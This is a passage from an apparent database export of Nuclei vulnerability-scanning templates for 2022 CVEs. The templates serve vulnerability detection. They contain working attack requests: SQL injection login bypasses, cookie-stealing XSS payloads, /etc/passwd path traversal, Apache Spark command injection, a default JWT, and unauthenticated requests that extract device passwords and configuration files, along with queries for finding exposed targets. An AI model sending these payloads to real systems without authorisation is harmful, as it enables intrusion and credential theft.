CVE-2022-32094\n cwe-id: CWE-89\n epss-score: 0.01192\n epss-percentile: 0.83651\n cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: hospital_management_system_project\n product: hospital_management_system\n shodan-query: http.html:\"Hospital Management System\"\n tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project\n\nhttp:\n - raw:\n - |\n POST /hms/doctor/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<title>Doctor | Dashboard'\n - 'View Appointment History'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210084fb69c1a03081213ac49cd95c8961662947511ae874b68981e489142096f3a3022100bc20375d33139ca01dac35f08cfcf15bd4ebd45605b6e478d37fd6fb506091ca:922c64590222798bb761d5b6d8e72950", "hash": "4788003b85efdf660f0956d7507be1b5", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308542" }, "name": "CVE-2022-32195.yaml", "content": "id: CVE-2022-32195\n\ninfo:\n name: Open edX <2022-06-06 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL.\n impact: |\n Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.\n remediation: |\n Apply the latest security patches or updates provided by Open edX to fix the Cross-Site Scripting vulnerability.\n reference:\n - https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408\n - https://github.com/edx\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32195\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-32195\n cwe-id: CWE-79\n epss-score: 0.00112\n epss-percentile: 0.43735\n cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: edx\n product: open_edx\n shodan-query: http.html:\"Open edX\"\n comment: Hover the cursor on the redirect link\n tags: cve,cve2022,openedx,xss,edx\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'click here to go to'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d1e44091a63188927cbb7a9f6b8d42e7480fcfe75384863173fdee98142046c002210080ce0e4cfa487b2b08f8891139e605f8293b0b80a4250b609f1c9ff37505ffb8:922c64590222798bb761d5b6d8e72950", "hash": "d9760a210842d4daafd69c959c70a9d0", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308543" }, "name": "CVE-2022-32409.yaml", "content": "id: CVE-2022-32409\n\ninfo:\n name: Portal do Software Publico Brasileiro i3geo 7.0.5 - Local File Inclusion\n author: pikpikcu\n severity: critical\n description: Portal do Software Publico Brasileiro i3geo 7.0.5 is vulnerable to local file inclusion in the component codemirror.php, which allows attackers to execute arbitrary PHP code via a crafted HTTP request.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Apply the latest patch or upgrade to a newer version of i3geo to fix the LFI vulnerability.\n reference:\n - https://github.com/wagnerdracha/ProofOfConcept/blob/main/i3geo_proof_of_concept.txt\n - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32409\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-32409\n cwe-id: CWE-22\n epss-score: 0.47251\n epss-percentile: 0.97372\n cpe: cpe:2.3:a:softwarepublico:i3geo:7.0.5:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: softwarepublico\n product: i3geo\n shodan-query: http.html:\"i3geo\"\n tags: cve2022,cve,i3geo,lfi,softwarepublico\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/i3geo/exemplos/codemirror.php?&pagina=../../../../../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022072e312e8df1571351e7a21ca6317934960724f0071495fe4169ca5b013300dcd022100cc5ac2a8a33a0acc037a5db55a65ebb9f5ae1937caac9aededb4a8a59ab3ec56:922c64590222798bb761d5b6d8e72950", "hash": "bf7f7065b85ebe29e2522b17fcdb7239", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308544" }, "name": "CVE-2022-3242.yaml", "content": "id: CVE-2022-3242\n\ninfo:\n name: Microweber <1.3.2 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2.\n reference:\n - https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/\n - https://www.tenable.com/cve/CVE-2022-3242\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3242\n - https://github.com/microweber/microweber/commit/68f0721571653db865a5fa01c7986642c82e919c\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-3242\n cwe-id: CWE-79,CWE-94\n epss-score: 0.024\n epss-percentile: 0.8882\n cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: microweber\n product: microweber\n shodan-query: http.favicon.hash:780351152\n tags: cve,cve2022,huntr,xss,microweber\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"\") && contains(tolower(body), \"microweber\")'\n condition: and\n# digest: 490a00463044022049539640dca818e246d16d9d5c7e24b3499600ed18ff1d74a3608b845d89688102207932b2ed5c81f7a4c34b58c4da1de8032eb2e0c1920be395f0b14d309d69293b:922c64590222798bb761d5b6d8e72950", "hash": "fb75f0aed48f8b472c3f51fdb70179e8", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308545" }, "name": "CVE-2022-32429.yaml", "content": "id: CVE-2022-32429\n\ninfo:\n name: MSNSwitch Firmware MNT.2408 - Authentication Bypass\n author: theabhinavgaur\n severity: critical\n description: |\n MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability allows an attacker to bypass authentication and gain unauthorized access to the affected device.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability.\n reference:\n - https://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html\n - https://elifulkerson.com/CVE-2022-32429/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32429\n - http://packetstormsecurity.com/files/169819/MSNSwitch-Firmware-MNT.2408-Remote-Code-Execution.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-32429\n cwe-id: CWE-287\n epss-score: 0.15342\n epss-percentile: 0.95742\n cpe: cpe:2.3:o:megatech:msnswitch_firmware:mnt.2408:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: megatech\n product: msnswitch_firmware\n shodan-query: http.favicon.hash:-2073748627 || http.favicon.hash:-1721140132\n tags: cve2022,cve,config,dump,packetstorm,msmswitch,unauth,switch,megatech\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin-hax/ExportSettings.sh\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"SSID1\"\n\n - type: regex\n part: header\n regex:\n - 'filename=\"Settings(.*).dat'\n - 'application/octet-stream'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f40c78cc0f0a72c1f287552733d6a8029c75a95273b1d2e8e9c7b02c553392850220647bafa53296ecf2b294942dd964b0f8ea4c278bd17ba8b267a8ecc5fad97fea:922c64590222798bb761d5b6d8e72950", "hash": "2d5afadcd17c3f952b020c70da5913e4", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308546" }, "name": "CVE-2022-32430.yaml", "content": "id: CVE-2022-32430\n\ninfo:\n name: Lin CMS Spring Boot - Default JWT Token\n author: DhiyaneshDK\n severity: high\n description: |\n An access control issue in Lin CMS Spring Boot v0.2.1 allows attackers to access the backend information and functions within the application.\n reference:\n - https://github.com/TaleLin/lin-cms-spring-boot\n - https://web.archive.org/web/20220721190946/https://www.mesec.cn/archives/277\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32430\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-32430\n epss-score: 0.00227\n epss-percentile: 0.60316\n cpe: cpe:2.3:a:talelin:lin-cms-spring-boot:0.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: talelin\n product: lin-cms-spring-boot\n fofa-query: body=\"心上无垢,林间有风\"\n tags: cve,cve2022,lin-cms,auth-bypass\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cms/admin/group/all\"\n headers:\n Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZGVudGl0eSI6MSwic2NvcGUiOiJsaW4iLCJ0eXBlIjoiYWNjZXNzIiwiZXhwIjoxNzUzMTkzNDc5fQ.SesmAnYN5QaHqSqllCInH0kvsMya5vHA1qPHuwCZ8N8\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"id\":'\n - '\"name\":'\n - '\"level\":'\n condition: and\n\n - type: word\n part: header\n words:\n - 'application/json'\n\n - type: status\n status:\n - 200\n\n - type: word\n part: body\n words:\n - ''\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205070fa2cc17c809a810baa1e6b6c9efb5acdfa42715da7c7f2d6cf0b62934576022045e59a8169ca884549c6f435801ed6873531f867ccc9de4433c0f251a1fa050f:922c64590222798bb761d5b6d8e72950", "hash": "a1b5e9ba189e4dd751b8bab1a5ff876c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308549" }, "name": "CVE-2022-32771.yaml", "content": "id: CVE-2022-32771\n\ninfo:\n name: WWBN AVideo 11.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'success' parameter, which is inserted into the document with insufficient sanitization.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538\n - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32771\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-32771\n cwe-id: CWE-79\n epss-score: 0.00074\n epss-percentile: 0.30395\n cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wwbn\n product: avideo\n shodan-query: http.html:\"AVideo\"\n tags: cve,cve2022,avideo,xss,wwbn\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?success=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'avideoAlertSuccess(\"'\n - 'text: \"'\n condition: or\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402205cd915db0a5e75b5298087a9d97667756ac6598deed750cf8ae835d0fb3052370220337036c281cbdf23199d21ac1cf6cf370e1cb4aecf7531ed418daf886f164cf2:922c64590222798bb761d5b6d8e72950", "hash": "8c8d3c51ad83f046ebb457322c69919f", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30854a" }, "name": "CVE-2022-32772.yaml", "content": "id: CVE-2022-32772\n\ninfo:\n name: WWBN AVideo 11.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n WWBN AVideo 11.6 contains a cross-site scripting vulnerability in the footer alerts functionality via the 'msg' parameter, which is inserted into the document with insufficient sanitization.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://talosintelligence.com/vulnerability_reports/TALOS-2022-1538\n - https://github.com/WWBN/AVideo/blob/e04b1cd7062e16564157a82bae389eedd39fa088/updatedb/updateDb.v12.0.sql\n - https://nvd.nist.gov/vuln/detail/CVE-2022-32772\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-32772\n cwe-id: CWE-79\n epss-score: 0.00056\n epss-percentile: 0.21026\n cpe: cpe:2.3:a:wwbn:avideo:11.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wwbn\n product: avideo\n shodan-query: http.html:\"AVideo\"\n tags: cve2022,cve,avideo,xss,wwbn\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'avideoAlertInfo(\"'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502200250c5a4a2f2f305db862778645d4302544e55e4d9df38285ae08572bbb8461c022100d024e870443986b8f5a4c16ed8f86c0807f0369aea5fbaa7f1dfde75e0c0bb76:922c64590222798bb761d5b6d8e72950", "hash": "914c7905d9067ffbc9e511d68d8a8556", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30854b" }, "name": "CVE-2022-33119.yaml", "content": "id: CVE-2022-33119\n\ninfo:\n name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software.\n reference:\n - https://github.com/badboycxcc/nuuo-xss/blob/main/README.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-33119\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/badboycxcc/badboycxcc\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-33119\n cwe-id: CWE-79\n epss-score: 0.0157\n epss-percentile: 0.86981\n cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nuuo\n product: nvrsolo_firmware\n shodan-query: http.html:\"NVRsolo\"\n tags: cve,cve2022,nvrsolo,xss,nuuo\n\nhttp:\n - raw:\n - |\n POST /login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: \"><\"\n\n language=en&user=user&pass=pass&submit=Login\n\n matchers:\n - type: dsl\n dsl:\n - 'contains(header, \"text/html\")'\n - 'status_code == 200'\n - contains(body,'<\\\"?cmd=')\n condition: and\n# digest: 4a0a00473045022100f0f38f1056959a80fda5a1d4ced07d7ae1ac102a7ba4c692c0b0150a62461f0502205b4da7a44c66b407918128ef1f68b82728505e5d40ef1467678a122bd7212b0b:922c64590222798bb761d5b6d8e72950", "hash": "5b3f50ce59449caccad37d8f3d7c0c37", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30854c" }, "name": "CVE-2022-33174.yaml", "content": "id: CVE-2022-33174\n\ninfo:\n name: Powertek Firmware <3.30.30 - Authorization Bypass\n author: pikpikcu\n severity: high\n description: |\n Powertek firmware (multiple brands) before 3.30.30 running Power Distribution Units are vulnerable to authorization bypass in the web interface. To exploit the vulnerability, an attacker must send an HTTP packet to the data retrieval interface (/cgi/get_param.cgi) with the tmpToken cookie set to an empty string followed by a semicolon. This bypasses an active session authorization check. This can be then used to fetch the values of protected sys.passwd and sys.su.name fields that contain the username and password in cleartext.\n impact: |\n An attacker can bypass authentication and gain unauthorized access to the Powertek Firmware, potentially leading to further compromise of the system.\n remediation: |\n Upgrade the Powertek Firmware to version 3.30.30 or higher to mitigate the vulnerability.\n reference:\n - https://gynvael.coldwind.pl/?lang=en&id=748\n - https://nvd.nist.gov/vuln/detail/CVE-2022-33174\n - https://github.com/Henry4E36/CVE-2022-33174\n - https://github.com/k0mi-tg/CVE-POC\n - https://github.com/nomi-sec/PoC-in-GitHub\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-33174\n cwe-id: CWE-863\n epss-score: 0.01241\n epss-percentile: 0.85189\n cpe: cpe:2.3:o:powertekpdus:basic_pdu_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: powertekpdus\n product: basic_pdu_firmware\n shodan-query: http.html:\"Powertek\"\n tags: cve2022,cve,powertek,auth-bypass,powertekpdus\n\nhttp:\n - raw:\n - |\n GET /cgi/get_param.cgi?xml&sys.passwd&sys.su.name HTTP/1.1\n Host: {{Hostname}}\n Cookie: tmpToken=;\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - ''\n - ''\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - '([A-Z0-9a-z]+)<\\/sys\\.passwd>'\n - '([a-z]+)<\\/sys\\.su\\.name>'\n part: body\n# digest: 490a0046304402205f3721d4d1cc1bd01d55480d74005f566999d1eb1f7aef883abe68afa60e1d4102202cd3dede0c67c2903cde37b3f54d432dcbb537f4bfb2e29d4ee779cac0609d99:922c64590222798bb761d5b6d8e72950", "hash": "ab128c9c8dd0e734621b059b12148a93", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30854d" }, "name": "CVE-2022-33891.yaml", "content": "id: CVE-2022-33891\n\ninfo:\n name: Apache Spark UI - Remote Command Injection\n author: princechaddha\n severity: high\n description: |\n Apache Spark UI is susceptible to remote command injection. ACLs can be enabled via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow impersonation by providing an arbitrary user name. An attacker can potentially reach a permission check function that will ultimately build a Unix shell command based on input and execute it, resulting in arbitrary shell command execution. Affected versions are 3.0.3 and earlier, 3.1.1 to 3.1.2, and 3.2.0 to 3.2.1.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n Apply the latest security patches or updates provided by Apache Spark to fix the remote command injection vulnerability.\n reference:\n - https://github.com/W01fh4cker/cve-2022-33891\n - https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc\n - http://packetstormsecurity.com/files/168309/Apache-Spark-Unauthenticated-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-33891\n - http://www.openwall.com/lists/oss-security/2023/05/02/1\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-33891\n cwe-id: CWE-78\n epss-score: 0.97289\n epss-percentile: 0.99851\n cpe: cpe:2.3:a:apache:spark:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: spark\n shodan-query: title:\"Spark Master at\"\n tags: cve2022,cve,apache,spark,authenticated,kev,packetstorm\nvariables:\n command: \"echo CVE-2022-33891 | rev\"\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?doAs=`{{url_encode(\"{{command}}\")}}`'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"19833-2202-EVC\"\n# digest: 4a0a00473045022100f22344f29260306acf31af5a7c61265f388bbd61bf8ad8e96f065030814ca986022035526b485b24e7be4616c64d3b5be9e9abd37bdbe893ca3ca0027058e83ff4c9:922c64590222798bb761d5b6d8e72950", "hash": "7aa8fa0b00360e638e8baf230ea20038", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30854e" }, "name": "CVE-2022-33901.yaml", "content": "id: CVE-2022-33901\n\ninfo:\n name: WordPress MultiSafepay for WooCommerce <=4.13.1 - Arbitrary File Read\n author: theamanrawat\n severity: high\n description: |\n WordPress MultiSafepay for WooCommerce plugin through 4.13.1 contains an arbitrary file read vulnerability. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n An attacker can access sensitive information stored in arbitrary files on the server, potentially leading to further compromise of the system.\n remediation: |\n Update WordPress MultiSafepay for WooCommerce plugin to version 4.13.1 or later.\n reference:\n - https://wordpress.org/plugins/multisafepay/\n - https://wordpress.org/plugins/multisafepay/#developers\n - https://patchstack.com/database/vulnerability/multisafepay/wordpress-multisafepay-plugin-for-woocommerce-plugin-4-13-1-unauthenticated-arbitrary-file-read-vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2022-33901\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-33901\n epss-score: 0.00779\n epss-percentile: 0.80981\n cpe: cpe:2.3:a:multisafepay:multisafepay_plugin_for_woocommerce:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: multisafepay\n product: multisafepay_plugin_for_woocommerce\n framework: wordpress\n tags: cve2022,cve,wp-plugin,wp,wordpress,unauth,multisafepay,woocommerce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"application/octet-stream\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202ae9ccfcd2d44fcb8006ba953a197c97d4ecfacdad1348585abddafee07bb83102204e83d79dbe8ee0856aa30e9d9833f4f2d553fd603b0952a23e5c83d208c62401:922c64590222798bb761d5b6d8e72950", "hash": "6658d99947fcbda1270e7ca778009857", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30854f" }, "name": "CVE-2022-33965.yaml", "content": "id: CVE-2022-33965\n\ninfo:\n name: WordPress Visitor Statistics <=5.7 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Visitor Statistics plugin through 5.7 contains multiple unauthenticated SQL injection vulnerabilities. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or further compromise of the WordPress site.\n remediation: |\n Update to the latest version of the WordPress Visitor Statistics plugin (>=5.8) to mitigate the SQL Injection vulnerability.\n reference:\n - https://patchstack.com/database/vulnerability/wp-stats-manager/wordpress-wp-visitor-statistics-plugin-5-7-multiple-unauthenticated-sql-injection-sqli-vulnerabilities\n - https://wordpress.org/plugins/wp-stats-manager/\n - https://wordpress.org/plugins/wp-stats-manager/#developers\n - https://nvd.nist.gov/vuln/detail/CVE-2022-33965\n - https://github.com/20142995/sectool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-33965\n cwe-id: CWE-89\n epss-score: 0.01233\n epss-percentile: 0.83986\n cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: plugins-market\n product: wp_visitor_statistics\n framework: wordpress\n google-query: inurl:\"/wp-content/plugins/wp-stats-manager\"\n tags: cve2022,cve,wordpress,wp-plugin,wp,unauth,sqli,wp-stats-manager,plugins-market\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n GET /?wmcAction=wmcTrack&url=test&uid=0&pid=0&visitorId=1331'+and+sleep(7)+or+' HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'duration>=7'\n\n - type: regex\n regex:\n - \"^1331' and sleep\\\\(7\\\\) or '$\"\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220458bd56d4667cfa3e15751e8422d0ba54e709c7e9d7a857053c0307e24cdaa8302205b0be1ac0171f03bb15ec954e402ff2fba222f6711aa86faffac17ebffc02f19:922c64590222798bb761d5b6d8e72950", "hash": "a5867ceb1fb262416e443dcfa70dda5e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308550" }, "name": "CVE-2022-34045.yaml", "content": "id: CVE-2022-34045\n\ninfo:\n name: WAVLINK WN530HG4 - Improper Access Control\n author: arafatansari\n severity: critical\n description: |\n WAVLINK WN530HG4 M30HG4.V5030.191116 is susceptible to improper access control. It contains a hardcoded encryption/decryption key for its configuration files at /etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to the router's settings and potentially compromise the network.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the access control issue.\n reference:\n - https://drive.google.com/file/d/1s5uZGC_iSzfCJt9BJ8h-P24vmsrmttrf/view?usp=sharing\n - https://nvd.nist.gov/vuln/detail/CVE-2022-34045\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-34045\n cwe-id: CWE-798\n epss-score: 0.05662\n epss-percentile: 0.93156\n cpe: cpe:2.3:o:wavlink:wl-wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wl-wn530hg4_firmware\n shodan-query: http.html:\"WN530HG4\"\n tags: cve,cve2022,wavlink,exposure\n\nhttp:\n - raw:\n - |\n GET /backupsettings.dat HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Salted__'\n\n - type: word\n part: header\n words:\n - application/octet-stream\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100fb0b8aa54fde332f8cd44ca55dfda68ee8eaad6e9c47f58cd20feb3873a04ac402206045d384f557a00bd359d936396b51e46a94bd70a5ff2e253f622d481a211aab:922c64590222798bb761d5b6d8e72950", "hash": "e588d8373a1a3ce532cc51d9631558e3", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308551" }, "name": "CVE-2022-34046.yaml", "content": "id: CVE-2022-34046\n\ninfo:\n name: WAVLINK WN533A8 - Improper Access Control\n author: For3stCo1d\n severity: high\n description: |\n WAVLINK WN533A8 M33A8.V5030.190716 is susceptible to improper access control. An attacker can obtain usernames and passwords via view-source:http://IP_ADDRESS/sysinit.shtml?r=52300 and searching for [logincheck(user);] and thereby possibly obtain sensitive information, modify data, and/or execute 